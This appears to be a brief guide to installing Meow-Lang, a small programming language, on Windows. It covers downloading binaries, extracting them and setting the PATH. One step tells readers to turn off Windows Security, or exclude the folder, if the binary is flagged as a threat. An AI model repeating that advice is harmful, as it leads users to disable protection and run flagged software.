How to Download and Install Meow-Lang on Windows

This guide will walk you through the process of downloading and installing Meow-Lang on a Windows computer.

Step 1: Go to the Release Channel

To download Meow-Lang, you'll need to visit the official release channel Follow these steps to get the latest binaries:

  1. Open your web browser and navigate to Meow-Lang's Release Channel.
  2. On the release channel page, you will find a list of the latest Meow-Lang releases.
  3. Select the version you want to download. I recommend choosing the latest stable release for the best experience.

Step 2: Download the Binaries

  1. After selecting a release version, you will find download links for various platforms. Choose the one that is labeled for Windows (win-64).
  2. Click on it, and your browser will start downloading the Meow-Lang binaries for Windows.

Step 3: Install Meow-Lang

  1. Once the download is complete, locate the downloaded file. It's usually in your "Downloads" folder.

  2. Double-click the downloaded file to open.

  3. If windows security flags the binary as a threat then you should turn off windows security or exclude meow-lang folder.

  4. Extract the files to any location you want.

  5. After the Extraction is finished, go inside the bin folder and set the path in your envoirment variable.

  6. Now you can make a file end it with .meow and then run meowlang <your file name>.meow. ENJOY!!!

That's it! You have successfully downloaded and installed Meow-Lang on your Windows machine. You're now ready to start writing code in Meow-Lang and exploring its capabilities.
